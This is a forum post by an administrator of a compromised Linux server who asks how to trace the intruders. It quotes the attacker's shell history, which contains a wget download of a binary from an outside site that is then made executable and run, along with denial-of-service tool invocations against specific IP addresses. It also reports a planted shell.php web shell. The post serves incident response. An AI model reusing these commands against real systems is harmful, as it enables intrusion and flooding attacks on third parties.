How to trace the hacker?
chkrootkit and rkhunter report that there are traces of several rootkits installed.
First I tried to clean manually following the recipes found on this forum and elsewhere on the net, but I could not do even the first steps (I could not save /etc/rc.d/rc.sysinit after removing xntps from it - why? I don't know)
So, I decided to choose the way many seem to prefer - asking a reinstall of the OS and setting up things from backups.
Before I ask for the format, though, it would be nice to find out something about the possible gate for my guests and also what they are doing and who they are.
Is it possible to trace them somehow?
I noticed two possible clues:
1) Clue 1
In /root/bash_history I find
./c4 -h 38.118.142.47
./c4 -h 213.201.220.28
./c4 -h 12.129.211.122
./c4 -d 200.158.70 -s 200
and
wget www.nots.it/samples/images/f3
chmod +x f3
./f3 193.50.212.184 65535 151551
./f3 167.7.9.66 65535 151515
./f3 38.118.142.57 65535 151515
Both c4 and f3 now sit in /usr/.../ and I figure they are used for DOS-like things:
./c4
C4 (v.442) '02 by live
et cetera
./f3
FUDEDOR (v3.0) by bonny - PRIVATE!@#!
et cetera
Could www.nots.it be involved in this activity or would they be victims?
2) Clue 2
/home/somedomain/public_html/tmp/shell.php
This can be found on 3 out of the ~10 domains on the box. According to apache access logs 2 or 3 computers from India visited this file.
How can I find out more? Is there any programmes that would help me?
Thank you for your thoughts.
rdx.
